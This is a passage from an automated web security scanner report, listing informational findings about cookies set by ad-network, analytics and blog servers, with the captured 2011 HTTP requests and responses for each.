GET /TCTUL001/twidget/1.jsonp?jsonp=jsonp1298773825717&numAuthors=7&numPosts=0&bf=tech&uip=&ua=&ref=http%3A%2F%2Ftechcrunch.com%2F2011%2F02%2F16%2Fforbes-accused-of-link-spam-plays-dumb-but-forgets-to-delete-all-the-links%2F&qh=TechCrunch&format=300x600 HTTP/1.1
Host: api.postup.com
Proxy-Connection: keep-alive
Referer: http://www.tweetup.com/twidget/twidget.2.300x600.html?partner=TCTUL001&keyword=TechCrunch&backfill=tech&refurl=http://techcrunch.com/2011/02/16/forbes-accused-of-link-spam-plays-dumb-but-forgets-to-delete-all-the-links/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 27 Feb 2011 02:31:59 GMT
Content-Type: text/javascript; charset=UTF-8
Connection: keep-alive
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: bc=D8420C77-CC05-4281-9149-D8D783B79626;Path=/;Expires=Wed, 24-Feb-21 02:31:59 GMT
Set-Cookie: sc=648470B5-53DF-4072-8B8C-3C66E7C5D921;Path=/
Set-Cookie: bp=NR6mPz0SXEsXB_t8NNHvEsKZO0M;Path=/
CP: NON DSP CURa ADMa DEVa TAIa IVAa IVDa OUR BUS IND UNI COM NAV INT CNT
Content-Length: 19528

jsonp1298773825717({"users":[{"created_at":"Wed May 19 20:08:01 PDT 2010","description":"News and opinions on technology, internet \u0026 media. Focused on investors, companies and products impacting
...[SNIP]...

7.115. http://ar.atwola.com/atd  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.atwola.com
Path:   /atd

Request

GET /atd HTTP/1.1
Host: ar.atwola.com
Proxy-Connection: keep-alive
Referer: http://cdn.at.atwola.com/_media/uac/tcode3.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AxData=; Axxd=1

Response

HTTP/1.1 302 Found
Date: Sun, 27 Feb 2011 17:45:02 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8l DAV/2
Expires: Sun, 27 Feb 2011 17:45:02 GMT
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: cords=MToxMjk4ODI4NzAyOjcsMTI5ODgyODcwMg==; domain=.ar.atwola.com; path=/; expires=Mon, 27 Jun 2011 17:45:02 GMT
Location: http://r.nexac.com/e/getdata.xgi?dt=br&pkey=jtkr94hrnfw22&ru=http://ar.atwola.com/atd?it=7%26iv=%3cna_id%3e%26rand=329065
Content-Length: 0
Content-Type: text/plain


7.116. http://ar.voicefive.com/b/wc_beacon.pli  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/wc_beacon.pli

Request

GET /b/wc_beacon.pli?n=BMX_G&d=0&v=method-%3E-1,ts-%3E1298944530.013,wait-%3E10000,&1298944567734 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N1260.gawkernetwork/B5173555.12;sz=300x250;pc=[TPAS_ID];ord=[timestamp]?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p58096422=exp=14&initExp=Sun Feb 20 13:23:21 2011&recExp=Sun Feb 20 15:33:35 2011&cpn=%25m&prad=50296263&arc=37630094&; ar_p39750809=exp=4&initExp=Sun Feb 20 15:54:29 2011&recExp=Mon Feb 21 22:06:08 2011&prad=1210151&arc=1444454&; UID=2206bdab-24.143.206.75-1298208201; ar_p81479006=exp=1&initExp=Tue Mar 1 01:55:30 2011&recExp=Tue Mar 1 01:55:30 2011&prad=59117794&arc=40340043&; BMX_G=method->-1,ts->1298944530; BMX_3PC=1

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 01 Mar 2011 01:55:31 GMT
Content-Type: image/gif
Connection: close
Vary: Accept-Encoding
Set-Cookie: BMX_G=method%2D%3E%2D1%2Cts%2D%3E1298944530%2E013%2Cwait%2D%3E10000%2C; path=/; domain=.voicefive.com;
Content-length: 42
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent

GIF89a.............!.......,........@..D.;

7.117. http://ar.voicefive.com/bmx3/broker.pli  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Request

GET /bmx3/broker.pli?pid=p81479006&PRAd=59117794&AR_C=40340043 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N1260.gawkernetwork/B5173555.12;sz=300x250;pc=[TPAS_ID];ord=[timestamp]?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p58096422=exp=14&initExp=Sun Feb 20 13:23:21 2011&recExp=Sun Feb 20 15:33:35 2011&cpn=%25m&prad=50296263&arc=37630094&; ar_p39750809=exp=4&initExp=Sun Feb 20 15:54:29 2011&recExp=Mon Feb 21 22:06:08 2011&prad=1210151&arc=1444454&; UID=2206bdab-24.143.206.75-1298208201

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 01 Mar 2011 01:55:30 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p81479006=exp=1&initExp=Tue Mar 1 01:55:30 2011&recExp=Tue Mar 1 01:55:30 2011&prad=59117794&arc=40340043&; expires=Mon 30-May-2011 01:55:30 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1298944530; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 26961

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"59117794",Pid:"p81479006",Arc:"40340043",Location:CO
...[SNIP]...

7.118. http://at.atwola.com/addyn/3.0/5113.1/221794/0/-1/noperf=1  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://at.atwola.com
Path:   /addyn/3.0/5113.1/221794/0/-1/noperf=1

Request

GET /addyn/3.0/5113.1/221794/0/-1/noperf=1;alias=93311232;cfp=1;noaddonpl=y;kvpg=techcrunch%2F2011%2F02%2F16%2Fforbes-accused-of-link-;kvugc=0;kvmn=93311232;target=_blank;aduho=-360;grp=773816832;misc=773816832 HTTP/1.1
Host: at.atwola.com
Proxy-Connection: keep-alive
Referer: http://techcrunch.com/wp-content/themes/vip/tctechcrunch/_uac/adpage.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATTACID=a3Z0aWQ9MTZsc3FpaTFuMWEzY3I=; ATTAC=a3ZzZWc9OTk5OTk6NTM1NzU6NTM2NTY6NTQwNjM6NTY3Njg6NTY4MzA6NTY4MzU6NjA1MDY6NjA1MTU6NTM2MTU6NTI3NjY6NjAxMzA6NTAyMTM6NTAyMzk=; CfP=1

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
P3P: CP="NOI DSP DEVa OUR BUS UNI COM NAV INT"
Content-Type: application/x-javascript
Content-Length: 720
Set-Cookie: JEB2=4D69B03F6E651A440C6EAF39F001EBEA;expires=Tue, 26 Feb 2013 2:31:26 GMT;domain=at.atwola.com;path=/

document.write("<!--*\n");
document.write("var aolAdId=\"1478994|1\";\n");
document.write("var aolSize=\"300|250\";\n");
document.write("*-->\n");
document.write("<SCR"+"IPT language='JavaScript1.1
...[SNIP]...

7.119. http://at.atwola.com/addyn/3.0/5113.1/221794/0/-1/size=125x125  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://at.atwola.com
Path:   /addyn/3.0/5113.1/221794/0/-1/size=125x125

Request

GET /addyn/3.0/5113.1/221794/0/-1/size=125x125;noperf=1;alias=93311149;cfp=1;noaddonpl=y;kvpg=techcrunch%2F2011%2F02%2F16%2Fforbes-accused-of-link-;kvugc=0;kvmn=93311149;target=_blank;aduho=-360;grp=773816832;misc=773816832 HTTP/1.1
Host: at.atwola.com
Proxy-Connection: keep-alive
Referer: http://techcrunch.com/wp-content/themes/vip/tctechcrunch/_uac/adpage.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATTACID=a3Z0aWQ9MTZsc3FpaTFuMWEzY3I=; ATTAC=a3ZzZWc9OTk5OTk6NTM1NzU6NTM2NTY6NTQwNjM6NTY3Njg6NTY4MzA6NTY4MzU6NjA1MDY6NjA1MTU6NTM2MTU6NTI3NjY6NjAxMzA6NTAyMTM6NTAyMzk=; CfP=1

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
P3P: CP="NOI DSP DEVa OUR BUS UNI COM NAV INT"
Content-Type: application/x-javascript
Set-Cookie: JEB2=4D69B03E6E651A440C6EAF39F001EBEA;expires=Tue, 26 Feb 2013 2:30:35 GMT;domain=at.atwola.com;path=/
Content-Length: 1235

document.write("<!--*\n");
document.write("var aolAdId=\"1473155|1\";\n");
document.write("var aolSize=\"125|125\";\n");
document.write("*--><iframe src=\"http://REDACTED.com/CNT/iview/302784236/
...[SNIP]...

7.120. http://at.atwola.com/addyn/3.0/5113.1/221794/0/-1/size=728x90  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://at.atwola.com
Path:   /addyn/3.0/5113.1/221794/0/-1/size=728x90

Request

GET /addyn/3.0/5113.1/221794/0/-1/size=728x90;cfp=1;rndc=129877383;noperf=1;alias=93311139;kvpg=techcrunch%2F2011%2F02%2F16%2Fforbes-accused-of-link-;kvugc=0;kvmn=93311139;target=_blank;aduho=-360;grp=773816832;misc=773816832 HTTP/1.1
Host: at.atwola.com
Proxy-Connection: keep-alive
Referer: http://techcrunch.com/wp-content/themes/vip/tctechcrunch/_uac/adpage.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATTACID=a3Z0aWQ9MTZsc3FpaTFuMWEzY3I=; ATTAC=a3ZzZWc9OTk5OTk6NTM1NzU6NTM2NTY6NTQwNjM6NTY3Njg6NTY4MzA6NTY4MzU6NjA1MDY6NjA1MTU6NTM2MTU6NTI3NjY6NjAxMzA6NTAyMTM6NTAyMzk=; CfP=1

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
P3P: CP="NOI DSP DEVa OUR BUS UNI COM NAV INT"
Content-Type: application/x-javascript
Content-Length: 498
Set-Cookie: JEB2=4D69B03F6E651A440C6EAF39F001EBEA;expires=Tue, 26 Feb 2013 2:31:14 GMT;domain=at.atwola.com;path=/

document.write("<!--*\n");
document.write("var aolAdId=\"1453125|2\";\n");
document.write("var aolSize=\"728|90\";\n");
document.write("*-->\n");
<!--
google_ad_client = "pub-6181816114362650";
/
...[SNIP]...

7.121. http://b.aol.com/master/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.aol.com
Path:   /master/

Request

GET /master/?1=1&HASH=42c3&REDIR=http://b.winamp.com/vanity/?ts=1298828556587&h=forums.winamp.com&v=9&t=&r=&l=0&ms=1&pageName=wna%20%3A%20winamp.com-forums&pageUrl=http%3A%2F%2Fforums.winamp.com%2F& HTTP/1.1
Host: b.aol.com
Proxy-Connection: keep-alive
Referer: http://forums.winamp.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26B17114051D1312-60000137800000AA[CE]

Response

HTTP/1.1 302 Found
Date: Sun, 27 Feb 2011 17:42:29 GMT
Server: Apache
P3P: CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAo IVDo CONo PHY ONL UNI PUR COM NAV INT DEM CNT STA POL PRE LOC OUR"
Location: http://b.winamp.com/vanity/?ts=1298828556587&h=forums.winamp.com&v=9&t=&r=&l=0&ms=1&pageName=wna%20%3A%20winamp.com-forums&pageUrl=http%3A%2F%2Fforums.winamp.com%2F&&UNAUTHID=1.f2ef68a2429811e08480dd7dbef96a52.877c
Set-Cookie: MUNAUTHID=1.f2ef68a2429811e08480dd7dbef96a52.01de; expires=Mon, 29-Aug-2011 08:36:52 GMT; path=/; domain=b.aol.com
Cache-Control: max-age=0
Expires: Sun, 27 Feb 2011 17:42:29 GMT
Content-Length: 438
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://b.winamp.com/vanity/?ts=1298828556587&am
...[SNIP]...

7.122. http://b.scorecardresearch.com/b  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Request

GET /b?c1=2&c2=8756795&rn=179460148&c7=http%3A%2F%2Fwww.project-syndicate.org%2F&c8=Project%20Syndicate%20-%20the%20highest%20quality%20op-ed%20(%20&cv=2.2&cs=js HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.project-syndicate.org/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=6d0f24-24.143.206.42-1297806131

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Sun, 27 Feb 2011 02:18:16 GMT
Connection: close
Set-Cookie: UID=6d0f24-24.143.206.42-1297806131; expires=Tue, 26-Feb-2013 02:18:16 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS


7.123. http://b.voicefive.com/b  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.voicefive.com
Path:   /b

Request

GET /b?c1=4&c2=p81479006&c3=59117794&c4=40340043&c5=1&c6=1&c7=Tue%20Mar%20%201%2001%3A55%3A30%202011&c8=http%3A%2F%2Fad.doubleclick.net%2Fadi%2FN1260.gawkernetwork%2FB5173555.12%3Bsz%3D300x250%3Bpc%3D%5BTPAS_ID%5D%3Bord%3D%5Btimestamp%5D%3F&c9=Advertisement&c10=http%3A%2F%2Fwww.businessinsider.com%2Fgabriel-weinberg-duckduckgo-2011-1&c15=&1298944567729 HTTP/1.1
Host: b.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N1260.gawkernetwork/B5173555.12;sz=300x250;pc=[TPAS_ID];ord=[timestamp]?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p58096422=exp=14&initExp=Sun Feb 20 13:23:21 2011&recExp=Sun Feb 20 15:33:35 2011&cpn=%25m&prad=50296263&arc=37630094&; ar_p39750809=exp=4&initExp=Sun Feb 20 15:54:29 2011&recExp=Mon Feb 21 22:06:08 2011&prad=1210151&arc=1444454&; UID=2206bdab-24.143.206.75-1298208201; ar_p81479006=exp=1&initExp=Tue Mar 1 01:55:30 2011&recExp=Tue Mar 1 01:55:30 2011&prad=59117794&arc=40340043&; BMX_G=method->-1,ts->1298944530; BMX_3PC=1

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Tue, 01 Mar 2011 01:55:31 GMT
Connection: close
Set-Cookie: UID=2206bdab-24.143.206.75-1298208201; expires=Thu, 28-Feb-2013 01:55:31 GMT; path=/; domain=.voicefive.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS


7.124. http://b.winamp.com/vanity/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.winamp.com
Path:   /vanity/

Request

GET /vanity/?ts=1298828556587&h=forums.winamp.com&v=9&t=&r=&l=0&ms=1&pageName=wna%20%3A%20winamp.com-forums&pageUrl=http%3A%2F%2Fforums.winamp.com%2F&&UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b HTTP/1.1
Host: b.winamp.com
Proxy-Connection: keep-alive
Referer: http://forums.winamp.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_getnr%3D1298828556997-New%7C1361900556997%3B%20s_nrgvo%3DNew%7C1361900556999%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 17:42:31 GMT
Server: Apache
Set-Cookie: UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; expires=Mon, 29-Aug-2011 08:36:54 GMT; path=/; domain=.winamp.com
Set-Cookie: CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; expires=Mon, 28-Feb-2011 05:42:31 GMT; path=/; domain=.winamp.com
Cache-Control: max-age=0
Expires: Sun, 27 Feb 2011 17:42:31 GMT
Content-Length: 42
Content-Type: image/gif

GIF89a.............!.......,...........D.;

7.125. http://bad-behavior.ioerror.us/2005/04/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bad-behavior.ioerror.us
Path:   /2005/04/

Request

GET /2005/04/ HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:15:46 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298762145+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Content-Length: 21746

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">
<meta property=
...[SNIP]...

7.126. http://bad-behavior.ioerror.us/2005/05/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bad-behavior.ioerror.us
Path:   /2005/05/

Request

GET /2005/05/ HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:15:45 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298762145+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Content-Length: 20270

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">
<meta property=
...[SNIP]...

7.127. http://bad-behavior.ioerror.us/2005/06/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bad-behavior.ioerror.us
Path:   /2005/06/

Request

GET /2005/06/ HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:15:44 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298762144+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Content-Length: 22500

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">
<meta property=
...[SNIP]...

7.128. http://bad-behavior.ioerror.us/2005/07/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bad-behavior.ioerror.us
Path:   /2005/07/

Request

GET /2005/07/ HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:15:44 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298762144+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Content-Length: 15855

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">
<meta property=
...[SNIP]...

7.129. http://bad-behavior.ioerror.us/2005/08/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bad-behavior.ioerror.us
Path:   /2005/08/

Request

GET /2005/08/ HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:15:45 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298762143+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Content-Length: 41340

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">
<meta property=
...[SNIP]...

7.130. http://bad-behavior.ioerror.us/2005/09/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bad-behavior.ioerror.us
Path:   /2005/09/

Request

GET /2005/09/ HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:15:43 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298762143+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Content-Length: 20878

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">
<meta property=
...[SNIP]...

7.131. http://bad-behavior.ioerror.us/2005/10/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bad-behavior.ioerror.us
Path:   /2005/10/

Request

GET /2005/10/ HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:15:43 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298762142+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Content-Length: 40011

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">
<meta property=
...[SNIP]...

7.132. http://bad-behavior.ioerror.us/2005/11/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bad-behavior.ioerror.us
Path:   /2005/11/

Request

GET /2005/11/ HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:15:41 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298762141+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Content-Length: 17684

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">
<meta property=
...[SNIP]...

7.133. http://bad-behavior.ioerror.us/2005/12/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bad-behavior.ioerror.us
Path:   /2005/12/

Request

GET /2005/12/ HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:15:37 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298762137+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Content-Length: 32488

